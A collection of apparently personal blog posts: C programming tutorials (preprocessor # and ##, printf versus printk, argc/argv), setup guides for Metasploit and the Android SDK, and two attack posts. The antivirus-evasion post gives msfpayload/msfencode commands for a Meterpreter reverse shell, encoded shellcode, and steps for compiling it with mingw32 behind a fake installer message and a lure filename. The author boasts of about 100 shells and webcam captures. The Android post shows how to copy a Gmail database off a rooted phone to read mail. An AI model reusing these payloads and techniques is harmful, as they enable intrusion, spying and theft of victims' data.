COMPLICATED PARAMETER PASSING IN #DEFINEs

If you are familiar with this term then you are surely a good programmers,
it is often slammed upon us to use it in our programs.

Why is it so important, well uses of this so called preprocessor are infinite.

from basic macro substitution to, case based selection,

and even some combined with ternary operators ( ? : ).

At this point everything moves well for every most of us,

but then its a pain in the place we hate the most as soon as we meet these type of declarations.
If have seen some really good programmers fall for this type of confusion.

--------------------------------------------------------------------------------------------------------------------------------------

#define true_statement(num) printf(#num " = %d\n", num)

--------------------------------------------------------------------------------------------------------------------------------------

For many of people, its like how the f@#$ another pound symbol got in thr,
this goes for guys learning programming online because 70-80% sites teaching C language are not covering up this minute detail.

Documentation for this type of usage can be acknowledged
 from the very famous "THE C PROGRAMMING LANGUAGE" by Kernighan and Ritchie.

As taken from their book
"formal parameters are not replaced within quoted strings. If, however, a parameter name is preceded by a # in the replacement text, the combination will be expanded into a quoted string with the parameter replace by the actual argument"

So
------------------------------------------------------------------------------------------------------------------------------------
//when invoked by num = 2

macro gets expanded into

printf("2" " = %d\n" , 2);

As we know the nature of "" " in C it obviously gets concatenated.

so end the result is

printf("2 = %d\n" , 2);


-------------------------------------------------------------------------------------------------------------------------------------

The example shown above is for integer type,
its common that another thought may arise in many of the readers

How does it manages special characters then??

These are the characters that must have crossed your mind, because these
are the ones that can lead to illegal string.

 =  "
 =  \

You dont need to worry about it, it gets fixed within the actual argument only,

" gets converted to "\ and each \ get converted to \\,
so string is still legal.


These types of reference are rarely used in common practices,
most common reason to avoid this is incapability of understanding for a greater mass.

That was still a rare though still can be found type of example,
but this is totally like once in a decade issue.

-------------------------------------------------------------------------------------------------------------------------------------
 #define two_digit(tenth_place,unit_place) tenth_place##unit_place
 -------------------------------------------------------------------------------------------------------------------------------------

One pound symbol was enough to create enough confusion, but now here we have two of them, but dont get fooled by the look, its rather easy to understand than the previous one.

Parameters passed through gets concatenated with each other.

## cause all white spaces to be removed surrounding it and if there lies a parameter adjacent to it, it replaces it with the actual parameter values.

Eg.
-------------------------------------------------------------------------------------------------------------------------------------
two_digit(1,2)

will result into

12
-------------------------------------------------------------------------------------------------------------------------------------

i hope you enjoyed reading this article,

Thanks for reading.
B-)

DEFEATING ANTI VIRUSES WITH DORKY TECHNIQUES

THIS INFORMATION IS FOR EDUCATIONAL PURPOSES ONLY. I WILL NOT BE HELD LIABLE

FOR WHAT YOU DO WITH THIS INFORMATION.

NOT FOR BEGINNERS,

PRIOR KNOWLEDGE OF C/C++ LANGUAGE IS NECESSARY, AND FUNCTIONING OF METASPLOIT FRAMEWORK.

//ALSO, THIS TECHNIQUE WAS FOUND BY ME ON 8/6/12. SO WORKING OF THIS WILL LAST TILL THE DATE NO UPDATE PATCH IS RELEASED FROM AV COMPANIES.

Most of you guys are familiar with metasploit framework, which is really popular for its day by day increasing inventory of exploits and tools, but on the same hands anti-virus companies are also trying to

stay in pace with this opensource project.

Everything comprising of metasploits arsenal is now heavily tagged by all avs and they get instantly detected. Inspite of this people are using it and still get their job done.

Questions is how??

When i started out on this topic, there were numerous videos and articles of bypassing antiviruses on youtube and forums.

But as you go down the articles and reach comment, there you will usualy find

“ sorry dude doesnt work anymore antiviruses tagging this also”.

Not thr fault, companies are keeping up good.

But still some guys out thr in the wild are still running ahead of them.

If you were in similar situation like mine, you must have also tried out every possible combination of encoders , and also various crypters available online.

And some lazzy chaps or maybe security professionals also who can afford services paid for crypting softwares in the market.

But now even that is not a problem companies are providing these service even more cheaper prices then you can imagine, just to cut down ther competition.

Now lets start with the inbuilt tools,

msfpayload --> simply generating an exe from this file was never a good choice.

msfpayload | msfencode --> this is what many peope have tried

The technique that i found is result of weird thoughts while having left over snacks late night.

Happy i had that.

Most of you who have used msfpayload are pretty familiar with the usage of it and how it can be used to generate shellcode.

And also raw stream to pipe it in other tools like msfencode.

On simply creating a shell code with msfpayload

$ /msfpayload windows/meterpreter/reverse_tcp lhost=192.168.1.14 lport=4474 C

/*

* windows/meterpreter/reverse_tcp - 290 bytes (stage 1)

* http://www.metasploit.com

* AutoRunScript=, ReverseConnectRetries=5, EXITFUNC=process,

* LPORT=4474, InitialAutoRunScript=, AutoSystemInfo=true,

* LHOST=192.168.1.14, AutoLoadStdapi=true, VERBOSE=false,

* EnableUnicodeEncoding=true

*/

unsigned char buf[] =

"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"

"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"

"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2"

"\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"

"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3"

"\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"

"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58"

"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"

"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff"

"\xe0

------trimmed -------------------------------------------------------------

/*

* windows/meterpreter/reverse_tcp - 752128 bytes (stage 2)

* http://www.metasploit.com

*/

unsigned char buf[] =

"\x4d\x5a\xe8\x00\x00\x00\x00\x5b\x52\x45\x55\x89\xe5\x81\xc3"

"\x4c\x15\x00\x00\xff\xd3\x89\xc3\x57\x68\x04\x00\x00\x00\x50"

"\xff\xd0\x68\xf0\xb5\xa2\x56\x68\x05\x00\x00\x00\x50\xff\xd3"

"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"

"\xf0\x00\x00\x00\x0e\x1f\xba\x0e\x00\xb4\x09\xcd\x21\xb8\x01"

----------trimmed-----------------------------------------------------------

So here we got our two staged meterpreter code..

but as well all string termination and null will occur due to

so many \x00.

So we encode it with msfencode

$ ./msfpayload windows/meterpreter/reverse_tcp lhost=192.168.1.14 lport=4474 R | ./msfencode -b \x00 -c 20 -e x86/shikata_ga_nai -t c

Now we are left with a clean shellcode free of null characters

unsigned char buf[] =

"\xda\xd2\xd9\x74\x24\xf4\x5a\xbe\xf8\x70\xd0\x2f\x33\xc9\xb1"

"\xc9\x31\x72\x1a\x03\x72\x1a\x83\xc2\x04\xe2\x0d\xad\x17\xf6"

"\x99\x6a\x6c\xb3\xb9\xfc\xa3\x8f\x61\x28\x75\xbe\x52\xad\x45"

"\xc5\x65\xe2\x56\xc5\x0d\x9e\x94\x77\xfe\xff\xee\xbd\x27\x93"

"\xbc\xae\x76\x84\x4d\xd6\xcc\xc4\xaf\xdc\xdb\x2a\x49\x2b\x3f"

"\x02\x73\x68\x6f\xb8\x27\xc4\x7f\x63\x4d\xda\x11\xe8\x9c\x44"

"\xe1\x10\xd4\x41\xea\xdd\xae\xf8\xfb\xbb\x21\x2e\xfa\x45\xf4"

"\x79\xea\x19\xd9\x68\x4c\xc6\x96\x40\x1b\xee\x8b\x15\xd4\x3c"

"\x06\x5c\x4b\x90\xb4\x8a\x5f\x01\x5c\xb6\xe8\x6f\x57\xd7\x98"

"\x01\x52\x13\x04\x64\x1f\xaf\x33\x0a\x6f\x85\x03\x9a\x20\x3f"

"\x21\xd8\x1f\x79\x74\xff\x06\xd6\x13\xb6\xd8\xb8\xe9\x82\xda"

"\x2c\x08\x30\x2c\x5b\xd4\xbe\xb0\x91\x9b\xd2\xa9\xdf\x8a\xb3"

"\x6f\x3a\x01\x53\xc0\x77\x84\x49\x2f\x0a\xb4\x47\xbe\x3c\x17"

"\xe0\x62\x7a\xe3\x08\x1c\xb3\xa9\xeb\x9b\x43\xf5\x38\x7c\x5a"

"\x97\x02\xe1\x6b\x3e\x5b\xfa\x6d\x83\xb0\x41\x81\x6b\x04\xf1"

"\x35\x1a\xa3\xef\xa4\xe4\x6a\x98\xb2\xef\x0c\x3c\xf3\xae\x0d"

"\x09\xc9\x4b\xd9\xdc\xc8\xbe\xa0\xe7\x91\x38\x61\x5d\x13\xe0"

"\x32\x22\x62\x6a\xb3\xe8\xd2\x8d\x37\xe7\xdb\xe5\x21\x7a\x15"

"\x1f\xea\xb3\x13\xeb\x18\xaa\x1b\x2b\xf8\xad\x73\x7f\x13\xd6"

"\x3c\xe6\xb4\xeb\xd7\x0a\xe6\x73\xa4\xa8\x13\xfe\x07\x67\x4a"

"\xa4\x37\xce\x62\xbb\x45\x51\x34\xb3\xe0\x73\xca\xb5\xe7\x1b"

"\x1f\xba\x38\x37\xba\xc0\x9a\xb6\xc3\x17\xf1\x68\x40\x27\x52"

"\xef\xf9\xe3\x93\x8f\x10\xe0\xef\x64\x8e\x0f\xcc\xa9\x69\x33"

"\xd7\x02\xda\xfe\xe8\xfc\x25\x5e\x52\xfa\x68\xc8\x8e\x32\x9a"

"\x7c\x29\x7e\x0b\x27\x3b\xf0\x94\xdc\x2d\x4b\x13\xc8\x81\x23"

"\xa0\xd1\x72\x1f\x01\x4c\x48\x85\x5c\xaf\xa4\x11\xd1\x86\x97"

"\xbd\xe4\xde\xdd\x76\xfb\x6f\xbb\xfa\x6f\x36\x86\x9d\x02\xd1"

"\xb1\x38\xa3\x86\x3b\xd5\xf7\x0b\xc4\x2a\x93\x07\x8a\x39\xee"

"\xf8\x11\x96\x0f\x3a\x7f\x6e\xba\xbe\x09\xa2\x97\x29\x68\x64"

"\x68\x7e\x28\xda\xd0\x89\x21\xef\x98\x11\xe9\x64\xeb\x94\x7b"

"\xc4\x5b\xfa\xfb\x88\x02\x93\x94\x41\x8b\x23\x58\xad\x3c\xaa"

"\x61\xb7\x27\x67\xfc\x80\x48\x8e\xdd\x24\x89\xd5\x26\x8a\x11"

"\xb6\x96\x33\x78\x34\x1c\x31\x67\x22\x54\xa8\xd3\x06\x6e\xc3"

"\xd3\x6b\xd1\xa9\xab\x51\xab\x64\xa9\xe4\x8a\xe0\x6f\x4e\x90"

"\xc3\x18\x33\xe5\x76\xa4\xc9\xde\xb4\xa1\x02\xb7\x28\x8e\x38"

"\x6c\xdb\xd8\x53\x1b\xbd\xd3\x38\x03\x8c\xa8\x0c\xbd\xf0\x48"

"\x8f\xa2\xb3\xfb\x39\xb1\x7f\x7d\x9a\x7c\x01\xac\xcd\x75\xc8"

"\x2b\xd8\xc6\x95\x9f\x90\xea\x7d\xb9\xe4\x17\x7c\x3a\xe8\x6a"

"\x6b\xfb\xb6\xf1\xa4\x0d\x69\xe0\x90\x88\xb9\xcf\x15\x7e\x21"

"\x14\x51\x38\x15\xdb\xe6\x54\x4c\x73\x5e\x52\xd9\x3b\x67\x65"

"\xa1\x55\x81\x2a\xef\x83\xc3\x7f\x96\x04\x86\xc7\x51\x95\xcf"

"\x50\xe2\x47\xb5\xfc\x11\x25\xf8\x6a\x1c\x02\xce\x80\x1b\xc4"

"\x47\xf7\xed\x88\xf3\x73\x68\xa9\x45\x78\x12\xfe\xb8\xe9\x98"

"\xd5\x52\x20\x90\x5d\x7f\x96\x76\x9a\x58\xdc\xaa\x13\xe1\xb7"

"\x2d\xaa\x15\xc8\x8d\x34\xa9\x04\xcc\x20\xd6\x21\xb8\x02\x84"

"\x83\xdf\x4d\x43\x68\xb5\x04\x27\x78\xfa\x1a\x0f\xdd\x8f\x5a"

"\x3b\x8e\x9f\x1f\xad\x8f\x6e\x28\x33\xa5\xcb\x9e\xbc\x80\x95"

"\x9e\x1b\x07\x21\x0e\xdc\x88\xea\x1f\x60\x1b\xd7\x55\x0d\x45"

"\xc2\xba\x5a\x3d\xa9\x74\xc5\xd2\xb1\xfe\x8e\x41\x9f\xfd\xad"

"\x58\x6a\x15\xeb\x56\x4f\x58\x79\x32\x44\x9d\xd9\xa4\x89\xab"

"\xbc\xd5\x63\x2c\x6d\x53\xa9\x2b\x32\xac\x2e\xe3\xeb\xe6\xf9"

"\xb5\x92\x61\xa3\xd5\x9e\x30\xbb\xea\x8e\x98\xe8\x3a\x44\xd4"

"\xaa\x8a\x6f\x75\x67\xb3\x24\x8f\x10\xbc\x09\x51\xd6\xd6\xbe"

"\xff\x95\xf3\x5d\x44\xe2\x04\x89\x54\xd7\xff\x3c\x36\xf2\x69"

"\xf7\xce\xaa\x7b\x5c\xcd\x3b\xa8\x56\x25\xee\xf4\xd6\x87\xbb"

"\x4e\x3d\x76\x86\x13";

Now comes the part which created wonders for me and left me with around 100 if shells in one week.

Pipe out this shellcode and compile it with migw32.

Yes guys thats the trick.

On any debian system just issue

$ apt-get install mingw32

and then you have it.

For some social-engineering fu i added

printf(“Extracting installer 96%.................”);

// i kno its studpid still workd for me.

Before the typecasted call to our payload.

And renamed my exe to “gtalk-fb-interchat-v7.83.exe”

it was catchy. Huh.

Now the major part is done,

Move it to virtual machine i had,

CONFIG

Xp sp3

Avira free (updated 15/5/2012 16:00pm)

Next are the screens for scanning

So everything worked out pretty much even, lets test it around with real user.

Fired up my apache2, hosted up on my machine only and url was by “tinyurl”

and “GOOGLE URL GENERATOR”

Here is the result for that also

How can we forget the pretty face.

Initiated webcam snap

Similar types of social engineered attacks were peformed throughtout the week

and

79 Anti viruses were found to be not able to detect this (including enterprise and free edition).

THANKS FOR READING

/// ALL PRIOR PERMISSIONS WERE TAKEN FROM OUR FRIENDLY VICTIM “AERIALS ASHU ”BEFORE INCLUDING THESE PICTURES.

 Thanks for reading, for queries and suggestions plz comment below.

B-)

IF have uploaded a video for p.o.c as well

 

Setting up metasploit framework on any linux the easy way !!

In this post i will be guiding you through an easy method of setting up your exploitation framework and this tool is nothing else than the superior metasploit framework..

GUYS THIS TUTORIAL IS FOR LINUX OS, IF YOU WANT THE SAME FOR WINDOWS COMMENT, MESSAGE ME.

So lets start out,

tools required :: a linux os

its upto you which one you prefer, im using arch linux but you can use ubuntu. Its a newbie-friendly distro as compared to arch.
www.ubunut.com

Assuming that your os in installed, doesnt matter on disk or virtually and updated (if not do it, and if you dont kno how, check below).

This whole framework is dependent on ruby language,
so first of all we require to resolve the required dependencies.
------------------------------------------------------------------------------------------------------------------------------

apt-get update && apt-get upgrade
//this will do the update part

now the dependencies

$ sudo apt-get install ruby libopenssl-ruby libyaml-ruby libdl-ruby libiconv-ruby libreadline-ruby irb ri rubygems

this will install the necessay packages
-------------------------------------------------------------------------------------------------------------------------------


Now the method we will using to fetch metasploit for our system is using subversion.
to kno more about it.
http://subversion.apache.org/

So install this also


-----------------------------------------------------------------------------------------------------------------------------------
$ apt-get install subversion
-----------------------------------------------------------------------------------------------------------------------------------

And now some other deps also to build native extensions

------------------------------------------------------------------------------------------------------------------------------------
$ sudo apt-get install build-essential ruby-dev libpcap-dev
------------------------------------------------------------------------------------------------------------------------------------

Now the minor things are done now comes the important part

Subversion is a version control system, basically what it does is it synchorises your local folder with the remote folder being used as a developement base

The remote url we will be :: https://www.metasploit.com/svn/framework3/trunk/

this is from where subversion will fetch all the files

So first to check your subversion setup issue this command

-----------------------------------------------------------------------------------------------------------------------------------
$ svn ls https://www.metasploit.com/svn/framework3/trunk/

svn >> acronym for subversion this is used for commands
-----------------------------------------------------------------------------------------------------------------------------------

something like this should be visible, it will list down the remote folders and files

If you get something similar that means you are ready to go.

now, do
------------------------------------------------------------------------------------------------------------------------------------
$ svn checkout https://www.metasploit.com/svn/framework3/trunk/ msf
or
$ svn co https://www.metasploit.com/svn/framework3/trunk/ msf

both are same, co is for checkout same as svn for the whole
--------------------------------------------------------------------------------------------------------------------------------------
This will create a folder named msf with all the files in your current directory.

This a big download and takes few seconds to initiate so wait for it,

soon it will start and your screen will be filled with data transfer details

So now you are back with all the downloaded files.

if you now issue ls command you will surely
see all the files

This is it this your framework succesfully installed.

 UPDATE

Now to update it this command can be used, for that you have to come to this directory everytime, as subversion checks the current directory to recognize the point of last update

------------------------------------------------------------------------------------------------------------------------------------
$ svn update
------------------------------------------------------------------------------------------------------------------------------------
//As you have just installed it you wont be requiring any update but i would recommend you keep updating it in a day or two for latest exploits, me myself usually do it everyday, you can automate this also with crontab.

After each update there is a revision no. left to keep track like this

Now you can test your main tool, in this all of these msf* tools are extremely useful and if used in a combined manner can render a desired exploitation.



issue this command
------------------------------------------------------------------------------------------------------------------------------------
$ ./msfconsole
------------------------------------------------------------------------------------------------------------------------------------
if it loads up without any errors with ruby interpreter then you are good to go and it should look like this, and you will be welcomed with a msf> prompt

EXTENSIONS

Now comes the part for installing extensions, not a priority but it is required to enable raw sockets and wifi modules.


Raw sockets,
go to your dir where you installed msf and then into external and then

----------------------------------------------------------------------------------------------------------------------------------
$ cd /opt/metasploit3/msf3/external/pcaprub/

$ ruby extconf.rb
$ make && make install

----------------------------------------------------------------------------------------------------------------------------------

Wifi modules

-----------------------------------------------------------------------------------------------------------------------------------

# cd  /opt/metasploit3/msf3/external/ruby-lorcon2/
# svn co http://802.11ninja.net/svn/lorcon/trunk lorcon2
# cd lorcon2
# ./configure --prefix=/usr && make && make install
# cd ..
# ruby extconf.rb
# make && make install

-------------------------------------------------------------------------------------------------------------------------------------

And we are done so go on test out your new framework.

Thanks for reading and plz comment for any help

B-)

How safe is your Android device

Hi guys this is yash aka yinsain again with a duly awaited post.

THIS IS FOR EDUCATIONAL PURPOSES, I STAND NO INVOLVEMENT IN WHAT YOU DO WITH THE INFORMATION PROVIDED.

Nowdays most of the people around us are in favour of using an android device in the name of a smartphone well after all its a smart choice too.

First thing that people think of while using a smart phone is staying online and updated.
But how safe is it, people are scribbling down their credentials on this tiny device to stay in contact but till date nothing has changed, every app or even a system requires a lookup file to authenticate whether the true user is thr or not.

passwords still are the strongest and the weakest security link in whole infosec thing.

Whenever even a kid even hears about hacking first thing that comes to his/her heart is password of an email-id, well here i will show you how to get in one without using a password.

So we will focus our this post on the same and then we will blend into other security aspects of what can be risky and what cant.

Two possible scenarios are there
--> either you have a brand new phone or a phone that you use as a casual guy nothing hardcore or test-head and by mistake you install a malicious apk that roots your phone for gainig priviledges, this is how most of these things are working.
the infamous GINGERBREAK exploit that created a chaos because of it being used in other malicious apk.

--> or you might be having a rooted phone like me, that you rooted down for your experiments,,

but how aware are you, of all possible dangerous factors.

So lets start with a rooted phone because in both of the cases above end point is this only.

I will be using my real phone only, no emulator to show this, so in this post,
my details will be visible.

Lets plug this phone in debugging mode and spawn the shell.

 layout is pretty standard.

now lets move towards the attractive folder data and again in data inside the previous one.

now issue ls command it will show you a long list of installed apk's data folders.

now we can easily navigate to our folder of our desired app.

Our grapes reside inside the  com.google.android.gm folder so go into that and then into databases again issue ls command.

As you can see my email id is thr in a folder name.

but the useful db file is downloads.db for android 2.1 and for my specific cyanogemod7rc2 its mailstore.ydeep18@gmail.com.db, we will copy that out to sdcard for further inspection.

cp  mailstore.ydeep18@gmail.com.db /sdcard

as this phone is rooted so acces denied problem will be there just like it wont cause a problem for any attacker who has gained root shell on your device.

now we have our db file, now how to open it, well i did this while is was in kota in a hostel so i had no pc around me for an year, so i downloaded an app on my phone only to perform this.
APP :: aSQLiteManager


Lets start first with the phone
so open up your aSQLiteManager

open db file, the mailstore one.

 select whichever you wanna view, but i kno the juicy one is messages. so lets open that

and with all your guts click on data to kno thr truth....

and there it is all your synchronised email, now say who needs a password.
and continously scrolling sideways

'

As you can see, how lethal this can be.

PREVENTIONS
:: please check permissions needed by your application before installing
:: never leave your unattented. This works 90% of the time.

I will soon post other stuff for android forensics

THanks for reading
B-)

Setting up your android tools ;]

Guys im again informing you this is not a tutorial for development, only things covered in this post will be about setting up your android tools.
Further posts may even dig deeper in android forensics.

So for even starting up with your setup you should first decide about your platform. I would recommend mac or a linux box, and this tutorial is also following the same. But windows guys dont feel bad, comment below and i will respond with solutions and help.

So guys if you are familiar with Linux then its a plus point, if you dont then also its not a major issue, you can catch up any time you want. Download any iso of a Linux distribution of your preference. I would recommend Ubuntu, its a bit rookie friendly.
heres the link download
These distros are available in livecd format but you will require a system with installation done because you want your changes to be persistent.

Daring new guys can surely install it on a system, but if you are scared of blowing of your close-to-your-heart windows installation then virtualization solutions are always present.

You can try out virtual-box or vmware-player both are excellent.

I wont be guiding for with a linux installation, so google it.

So, lets assume now you have a working linux distribution on a disk or virtually, or maybe you are on the classier side and giving a smirk with a mac.
But mac guys take care and check out the documentation because im not helping.

linux guys now fire up your terminal.
If you are on an older version of ubuntu say before 11.04, then you probably on gnome2 enviroment so go to applications under accesories  or system tools there will be terminal, on a newer distro, guys just hit your windows key and type in terminal it will be there.


so you have your terminal opened up.

now lets resolve the dependencies required to run our sdk.

----------------------------------------------------------------------------------------------------

apt-get install default-jre

&& and if you are on a 64 bit machine like me then also

apt-get install ia32-libs

------------------------------------------------------------------------

Now we require our sdk
you can get it from

http://developer.android.com/sdk/index.html

As we are working on linux so fetch the required tar file and place it in a
folder of your choice.

Usually additional installation are done under /opt directory but you can feel free to put it anywhere, for the rest of the post i wil be keeping it in /opt.

gain the required priviledges for that folder and continue to extract it.

for newbies please just right click and follow it.
for guys who are comfortable and wanna learn do this
----------------------------------------------------------------------------------------------------------------
reach your directory and

do

tar zxvf android-sdk_r18-linux.tgz

the no. after r may vary for you depending on when are you viewing this
-----------------------------------------------------------------------------------------------------------------

now cd into the directory issue ls command

now some of the sub-directories are visible.
first and the most important utility require is adb, but unfortunately, it has been shifted to platforms folder that means we have to download it.
For that go into tools directory and enter ./android.

Another screen will pop up showing a gui like this select Android platform tools and then click on install package.

let it download the required package.

After its done, go back to upper directory and then into platform-tools and issue ls command.

So here we are, our two of the most important tools that we require are here.
adb and fastboot.

Now you can issue command ./adb devices but no devices will be shown if not

connected in debugging mode,

here is how you can put your android in debugging mode go to settings/application/development and then select Android debugging.

so now your device is ready,
now try again, it should show it now.,

now you can issue ./adb shell command too, as tis the only device connected it will drop down its shell only,
now its upto you how you explore into.

and we have the android shell..


Plz do follow the post nxt post regarding android will go into forensics of its filesystem.

Thanks for reading
B-)

Truth about the abundantly used printf()

If you are a beginner programmer in C, then you must have created almost every program with a printf() function, what is so important about it that we use it in most of our programs?
It provides us with visual details of what a program is outputting. It basically writes out its result onto the stdout.

But if you go through the lines submitted by the creators themselves i.e. Brian W. Kernighan and Dennis M. Ritchie, you will be shocked for a bit, but it is the truth,

"by the way, printf is not a part of the C language; there is no imput or ouput defined in C itself. printf is just a useful function from the standard library of functions that are normally accessible to C programs."

This thin, yet powerful language which is said to be portable infact is as portable as its libraries. Its libraries are its extensions which creates functionality.
There are just so many libraries available in the wild supporting all types of architectures and instrcution sets that it may appear c language is highly portable.

As this language is a major constituent for the famous unix os and the gnu/linux kernel, you can judge how powerful its functioning is. But still most of the work is done under the hood, no output to a console is made to every little syscall or connection.

This can be very easily explained by a simple example of kernel programming.
here

  

 as you can see in this, no use of printf can be seen but instead printk is used.

make file for the same is here

issue the make command to generate the neccesary executables.

 so as you can see, a kernel module has been compiled.

now lets insert our module into the kernel with insmod command. {issue sudo command if required for privilidges}

 so now even the module has been inserted succesfully, a weird questions arises, where is the output for printk()

here it is, the last line, this log can be viewed by dmesg command same thing happens when we remove our module from the kernel by issuing rmmod command, then it prints out the line in cleanup_module(),

Still for many of you there is a question that haunts you, where did the output go and why it never came up on any console screen.

in this eg, procedure of module loading and unloading is shown, this takes place several time during your reboots and shutdowns, but for most of them no output is shown, just a mere on-success statement is passed.

printf is also similar, its just for our better presentation and debugging help, in real programming it never plays any major role. This whole kernel loading thing was managed by kernel and all the outputs were logged in syslogd/klogd. So these daemons are high end designs/programs created in c, yet they dont use printf().

I hope this was of help for you. Thanks for reading. B-)

Argument passing to main() function explained

I have seen many people put up videos tutoring about c programming and stuff,
but most of those videos lack some of the major concepts important for practical
programming.
So i thought why not cover this topic too, this is also an outcome of requests from friends, having problems in same topic.

A prior knowledge of string constants, argument passing, pointers, pointers to pointers is necessary in any programming language, helps you to get eased up for it, if you know c then its even better,

lest start with a simple code that is so popular that even a non programmer who ever wanted to learn programming but lost interest must have also seen before throwing the book, yeah u got me right its the oldskool HELLO WORLD eg

+--------------------------------------------------------------------------------------------------------------------------------+

#include <stdio.h>

main(){

printf("hello world");
}

+---------------------------------------------------------------------------------------------------------------------------------+

when you compile this code snippet, you get the usual hello world output on screen, but this is constraining our will to program the way we want, in this example hello world string will get hard coded into the executable generated after compiling.

One question arises commonly, why cant it be dynamic??
ans is simple, it can be made dynamic, creators of c were not so foolish to leave such a thing. This can be achieved with parameter passing just like any other function, but the only difference between this type of argument passing is that arguments are passed from the enviroment of your os not inside your program.

With a slight modification in the code above you can achieve it,

+--------------------------------------------------------------------------------------------------------------------------------+

#include <stdio.h>

main(int argc, char *argv[])
// sometimes also seen as main(int argc, char **argv)
{

printf("%s",argv[1]);
}

+--------------------------------------------------------------------------------------------------------------------------------+

now the explanation bit,

structure of your main has changed to

main(INT, CHAR POINTER TO STRING POINTERS)
{ 
   }


lets start with the first argument

argc --> its an integer data type,
        --> keeps the count of total arguments

in a standalone program with no parameters, vaue of argc is always 1,
this facility can be used for error checking
IF (parameters less than 2)
PRINT plz check the usage or plz pass correct number of arguments.

this variable increments with your no of parameters you pass.

lets say your compiled program is helloworld.

so on a linux box

$./helloworld hello this is a parameter passing example

or a windows machine

>helloworld.exe hello this is a parameter passing example

value of argc will increment this way

+-----------------------------------------------------------------------
| execution| helloworld| this| is | a | parameter
|----------------+------------------------------------------------------
| argc         |          1      |  2   | 3  | 4      5
+-----------------------------------------------------------------------

and goes on.

now lets get onto next parameter,

char *argv[] or **argv


--> this is a pointer to an array of pointer

this is the portion where it gets confusing for some people, but i will start from the base and we can build our way up,

so the concept of an array

what is an array??

it is a contiguous block of memory which can be used to store data in a rightly order.
main points about it.

--> array name is a pointer itself,
basically it points to the first memory block of the array.

so this code is also fairly legal,

-------------------------------------------------------------------
int *p , egarray[2];
 p = egarray;
//then
printf() for egarray[0] and *p will output the
same value.
----------------------------------------------------------------------

 arrays can be created for all possible datatypes depending on your needs, int ,char n struct arrays are common in and same is with array of pointers.

think of it as a registers which stores the starting point of another array

pointer to pointer can be explained like this,

array ar;
                      ar0 | p1| -->q1
                      ar1 | p2| -->q2
                      ar2 | p3| -->q3
                      ar3 | p4| -->q4
                      ar4 | p5| -->q5

and these q pointers can be anything,,
but in this case we are talking about parameter passing which generally is in form of a statement/string.

so these q are all themselves  in  a form of

q="your parameter for the no. respectively";

so i hope this clears out the two parameters of main()

i have also uploaded a video to show you a jist of it, for gaining practical
confidence,, here.

there is one more minute query left which people get stuck with it, dont worry i will cover that too,

why is thr no " " in system() while using argv[]????

simple, these functions also take input as a string constant, which argv[] supplies to them as a pointer leading to it.

thanks for reading,
i hope this clears out some clouds for you.
B-)